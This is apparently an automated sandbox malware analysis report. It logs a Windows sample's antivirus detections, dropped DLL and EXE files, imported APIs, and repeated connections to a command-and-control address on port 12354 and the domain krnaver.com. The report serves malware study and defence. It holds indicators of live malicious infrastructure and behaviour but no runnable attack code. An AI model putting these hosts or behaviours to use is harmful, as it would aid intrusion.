2024-12-11T16:26:23.736151+010028032702Potentially Bad Traffic192.168.2.951231107.163.241.20412354TCP
2024-12-11T16:26:23.736202+010028032702Potentially Bad Traffic192.168.2.951179107.163.241.20412354TCP
2024-12-11T16:26:25.970593+010028032702Potentially Bad Traffic192.168.2.952745107.163.241.20412354TCP
2024-12-11T16:26:26.078215+010028032702Potentially Bad Traffic192.168.2.952943107.163.241.20412354TCP
2024-12-11T16:26:27.751848+010028032702Potentially Bad Traffic192.168.2.955105107.163.241.20412354TCP
2024-12-11T16:26:27.751865+010028032702Potentially Bad Traffic192.168.2.955099107.163.241.20412354TCP
2024-12-11T16:26:30.003505+010028032702Potentially Bad Traffic192.168.2.956148107.163.241.20412354TCP
2024-12-11T16:26:30.095486+010028032702Potentially Bad Traffic192.168.2.956266107.163.241.20412354TCP
2024-12-11T16:26:32.005887+010028032702Potentially Bad Traffic192.168.2.957654107.163.241.20412354TCP
2024-12-11T16:26:32.006116+010028032702Potentially Bad Traffic192.168.2.957522107.163.241.20412354TCP
2024-12-11T16:26:34.236624+010028032702Potentially Bad Traffic192.168.2.959061107.163.241.20412354TCP
2024-12-11T16:26:34.361167+010028032702Potentially Bad Traffic192.168.2.959074107.163.241.20412354TCP
2024-12-11T16:26:36.004817+010028032702Potentially Bad Traffic192.168.2.960939107.163.241.20412354TCP
2024-12-11T16:26:36.004900+010028032702Potentially Bad Traffic192.168.2.960826107.163.241.20412354TCP
2024-12-11T16:26:38.267623+010028032702Potentially Bad Traffic192.168.2.962420107.163.241.20412354TCP
2024-12-11T16:26:38.345685+010028032702Potentially Bad Traffic192.168.2.962477107.163.241.20412354TCP
2024-12-11T16:26:40.017452+010028032702Potentially Bad Traffic192.168.2.964620107.163.241.20412354TCP
2024-12-11T16:26:40.017577+010028032702Potentially Bad Traffic192.168.2.964839107.163.241.20412354TCP
2024-12-11T16:26:42.406739+010028032702Potentially Bad Traffic192.168.2.949910107.163.241.20412354TCP
2024-12-11T16:26:42.519950+010028032702Potentially Bad Traffic192.168.2.950045107.163.241.20412354TCP
2024-12-11T16:26:44.033810+010028032702Potentially Bad Traffic192.168.2.951593107.163.241.20412354TCP
2024-12-11T16:26:44.033850+010028032702Potentially Bad Traffic192.168.2.951424107.163.241.20412354TCP
2024-12-11T16:26:46.283466+010028032702Potentially Bad Traffic192.168.2.952000107.163.241.20412354TCP
2024-12-11T16:26:46.400861+010028032702Potentially Bad Traffic192.168.2.952120107.163.241.20412354TCP
2024-12-11T16:26:48.072887+010028032702Potentially Bad Traffic192.168.2.954323107.163.241.20412354TCP
2024-12-11T16:26:48.072915+010028032702Potentially Bad Traffic192.168.2.954419107.163.241.20412354TCP
2024-12-11T16:26:50.346777+010028032702Potentially Bad Traffic192.168.2.956239107.163.241.20412354TCP
2024-12-11T16:26:50.486220+010028032702Potentially Bad Traffic192.168.2.956241107.163.241.20412354TCP
2024-12-11T16:26:52.127576+010028032702Potentially Bad Traffic192.168.2.958669107.163.241.20412354TCP
2024-12-11T16:26:52.127599+010028032702Potentially Bad Traffic192.168.2.958756107.163.241.20412354TCP
2024-12-11T16:26:54.487042+010028032702Potentially Bad Traffic192.168.2.960813107.163.241.20412354TCP
2024-12-11T16:26:54.487186+010028032702Potentially Bad Traffic192.168.2.960811107.163.241.20412354TCP
2024-12-11T16:26:56.253329+010028032702Potentially Bad Traffic192.168.2.962747107.163.241.20412354TCP
2024-12-11T16:26:56.253376+010028032702Potentially Bad Traffic192.168.2.962754107.163.241.20412354TCP
2024-12-11T16:26:58.487871+010028032702Potentially Bad Traffic192.168.2.964340107.163.241.20412354TCP
2024-12-11T16:26:58.596067+010028032702Potentially Bad Traffic192.168.2.964411107.163.241.20412354TCP
2024-12-11T16:27:00.267499+010028032702Potentially Bad Traffic192.168.2.949961107.163.241.20412354TCP
2024-12-11T16:27:00.267696+010028032702Potentially Bad Traffic192.168.2.950008107.163.241.20412354TCP
2024-12-11T16:27:02.502711+010028032702Potentially Bad Traffic192.168.2.951627107.163.241.20412354TCP
2024-12-11T16:27:02.721139+010028032702Potentially Bad Traffic192.168.2.951781107.163.241.20412354TCP
2024-12-11T16:27:04.283021+010028032702Potentially Bad Traffic192.168.2.953449107.163.241.20412354TCP
2024-12-11T16:27:04.283070+010028032702Potentially Bad Traffic192.168.2.953250107.163.241.20412354TCP
2024-12-11T16:27:06.517930+010028032702Potentially Bad Traffic192.168.2.954167107.163.241.20412354TCP
2024-12-11T16:27:06.627499+010028032702Potentially Bad Traffic192.168.2.954268107.163.241.20412354TCP
2024-12-11T16:27:08.302686+010028032702Potentially Bad Traffic192.168.2.956076107.163.241.20412354TCP
2024-12-11T16:27:08.302725+010028032702Potentially Bad Traffic192.168.2.956250107.163.241.20412354TCP
2024-12-11T16:27:10.597110+010028032702Potentially Bad Traffic192.168.2.957568107.163.241.20412354TCP
2024-12-11T16:27:10.738514+010028032702Potentially Bad Traffic192.168.2.957657107.163.241.20412354TCP
2024-12-11T16:27:12.315448+010028032702Potentially Bad Traffic192.168.2.960035107.163.241.20412354TCP
2024-12-11T16:27:12.315546+010028032702Potentially Bad Traffic192.168.2.960195107.163.241.20412354TCP
2024-12-11T16:27:14.565598+010028032702Potentially Bad Traffic192.168.2.961976107.163.241.20412354TCP
2024-12-11T16:27:14.661319+010028032702Potentially Bad Traffic192.168.2.962080107.163.241.20412354TCP
2024-12-11T16:27:16.330830+010028032702Potentially Bad Traffic192.168.2.964288107.163.241.20412354TCP
2024-12-11T16:27:16.330876+010028032702Potentially Bad Traffic192.168.2.964142107.163.241.20412354TCP
2024-12-11T16:27:18.565804+010028032702Potentially Bad Traffic192.168.2.965421107.163.241.20412354TCP
2024-12-11T16:27:18.674627+010028032702Potentially Bad Traffic192.168.2.965491107.163.241.20412354TCP
2024-12-11T16:27:20.346027+010028032702Potentially Bad Traffic192.168.2.951155107.163.241.20412354TCP
2024-12-11T16:27:20.346051+010028032702Potentially Bad Traffic192.168.2.951268107.163.241.20412354TCP
2024-12-11T16:27:22.580871+010028032702Potentially Bad Traffic192.168.2.952585107.163.241.20412354TCP
2024-12-11T16:27:22.721731+010028032702Potentially Bad Traffic192.168.2.952771107.163.241.20412354TCP
2024-12-11T16:27:24.470569+010028032702Potentially Bad Traffic192.168.2.954999107.163.241.20412354TCP
2024-12-11T16:27:24.470681+010028032702Potentially Bad Traffic192.168.2.955132107.163.241.20412354TCP
2024-12-11T16:27:26.706538+010028032702Potentially Bad Traffic192.168.2.956775107.163.241.20412354TCP
2024-12-11T16:27:26.832478+010028032702Potentially Bad Traffic192.168.2.956923107.163.241.20412354TCP
2024-12-11T16:27:28.486065+010028032702Potentially Bad Traffic192.168.2.958580107.163.241.20412354TCP
2024-12-11T16:27:28.486151+010028032702Potentially Bad Traffic192.168.2.958639107.163.241.20412354TCP
2024-12-11T16:27:30.893650+010028032702Potentially Bad Traffic192.168.2.960181107.163.241.20412354TCP
2024-12-11T16:27:31.035071+010028032702Potentially Bad Traffic192.168.2.960346107.163.241.20412354TCP
2024-12-11T16:27:32.502317+010028032702Potentially Bad Traffic192.168.2.962705107.163.241.20412354TCP
2024-12-11T16:27:32.502322+010028032702Potentially Bad Traffic192.168.2.962711107.163.241.20412354TCP
2024-12-11T16:27:34.738010+010028032702Potentially Bad Traffic192.168.2.963434107.163.241.20412354TCP
2024-12-11T16:27:34.846804+010028032702Potentially Bad Traffic192.168.2.963529107.163.241.20412354TCP
2024-12-11T16:27:36.517472+010028032702Potentially Bad Traffic192.168.2.964971107.163.241.20412354TCP
2024-12-11T16:27:36.517667+010028032702Potentially Bad Traffic192.168.2.964828107.163.241.20412354TCP
2024-12-11T16:27:38.760325+010028032702Potentially Bad Traffic192.168.2.950396107.163.241.20412354TCP
2024-12-11T16:27:38.863200+010028032702Potentially Bad Traffic192.168.2.950467107.163.241.20412354TCP
2024-12-11T16:27:40.533136+010028032702Potentially Bad Traffic192.168.2.951864107.163.241.20412354TCP
2024-12-11T16:27:40.533184+010028032702Potentially Bad Traffic192.168.2.952000107.163.241.20412354TCP
2024-12-11T16:27:42.768791+010028032702Potentially Bad Traffic192.168.2.953660107.163.241.20412354TCP
2024-12-11T16:27:42.880346+010028032702Potentially Bad Traffic192.168.2.953773107.163.241.20412354TCP
2024-12-11T16:27:44.569025+010028032702Potentially Bad Traffic192.168.2.955930107.163.241.20412354TCP
2024-12-11T16:27:44.569100+010028032702Potentially Bad Traffic192.168.2.955792107.163.241.20412354TCP
2024-12-11T16:27:46.815470+010028032702Potentially Bad Traffic192.168.2.957469107.163.241.20412354TCP
2024-12-11T16:27:46.957171+010028032702Potentially Bad Traffic192.168.2.957499107.163.241.20412354TCP
2024-12-11T16:27:48.707705+010028032702Potentially Bad Traffic192.168.2.958794107.163.241.20412354TCP
2024-12-11T16:27:48.707911+010028032702Potentially Bad Traffic192.168.2.958773107.163.241.20412354TCP
2024-12-11T16:27:50.940467+010028032702Potentially Bad Traffic192.168.2.959420107.163.241.20412354TCP
2024-12-11T16:27:51.050238+010028032702Potentially Bad Traffic192.168.2.959536107.163.241.20412354TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: XgijTrY6No.exeAvira: detected
Antivirus detection for dropped file
Source: C:\ftelcs\rjqzr.dllAvira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeAvira: detection malicious, Label: TR/Farfli.ltgad
Multi AV Scanner detection for dropped file
Source: C:\ftelcs\rjqzr.dllReversingLabs: Detection: 67%
Multi AV Scanner detection for submitted file
Source: XgijTrY6No.exeReversingLabs: Detection: 89%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
Machine Learning detection for dropped file
Source: C:\ftelcs\rjqzr.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\mszcy.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: XgijTrY6No.exeJoe Sandbox ML: detected
Source: XgijTrY6No.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Windows\SysWOW64\rundll32.exeFile created: c:\ftelcs\ReadMe.txtJump to behavior
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:49834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:50474 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:65319 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:51928 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:55360 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:57674 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:64288 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:50429 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:53886 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:58183 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:63507 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:50555 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:54516 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:57011 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:60253 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:64188 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:54066 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:58376 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:62469 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:49958 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:52868 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:59714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:63675 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:50825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:54534 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:58497 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:62214 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:64509 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:51516 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:55401 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:58770 version: TLS 1.2
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*.** source: rundll32.exe, 00000006.00000003.3597257344.0000000000D03000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rod.pdb\*.** source: rundll32.exe, 00000006.00000003.1813794875.0000000000D3D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1813762319.0000000000D34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.** source: rundll32.exe, 00000006.00000003.2262348463.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.**e source: rundll32.exe, 00000006.00000003.1572496969.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1572330291.0000000000D46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: rundll32.exe, 00000006.00000003.2262330522.0000000000D42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000006.00000003.3597257344.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.**.*** source: rundll32.exe, 00000006.00000003.3031707203.0000000005B50000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000B0A0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,rand,lstrcpy,lstrcat,lstrcat,_strcmpi,GetTickCount,srand,rand,rand,rand,rand,rand,rand,rand,rand,wsprintfA,wsprintfA,WinExec,Sleep,wsprintfA,Sleep,strchr,strchr,strchr,strchr,atoi,WinExec,DeleteFileA,Sleep,lstrcat,FindNextFileA,FindClose,6_2_1000B0A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100052A0 FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,6_2_100052A0
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 202.108.0.52 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: krnaver.com
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.241.204 12354Jump to behavior
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 107.163.241.204 ports 1,2,3,4,5,12354
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50319 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50354 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50356 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50414 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50416 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50450 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50483 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50517 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50521 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50610 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50614 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50675 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50681 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50726 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50730 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50804 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50810 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50858 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50959 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50969 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51054 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51059 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51165 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51174 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51270 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51281 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51398 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51413 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51518 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51526 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51647 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51656 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51746 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51754 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51887 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51895 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53096 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53196 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55196 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55373 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56825 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56943 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58262 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58391 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59886 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60187 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62140 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62324 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63850 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63953 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49408 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50887 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50978 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52262 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52324 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53384 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 53421 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55505 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55526 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56247 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56326 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57951 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58061 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58996 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59064 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60767 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60826 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62599 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62749 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64837 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64938 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50770 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50952 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52148 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 54341 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56340 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56384 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58345 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 58350 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59128 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59213 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60550 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60645 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61837 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 61878 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63820 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 63928 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51179 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51231 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52745 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52943 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55099 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 55105 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56148 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 56266 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57522 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 57654 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59061 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 59074 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60826 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 60939 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62420 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 62477 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64620 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 64839 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51424 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 51593 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52000 -> 12354
Source: unknownNetwork traffic detected: HTTP traffic on port 52120 -> 12354
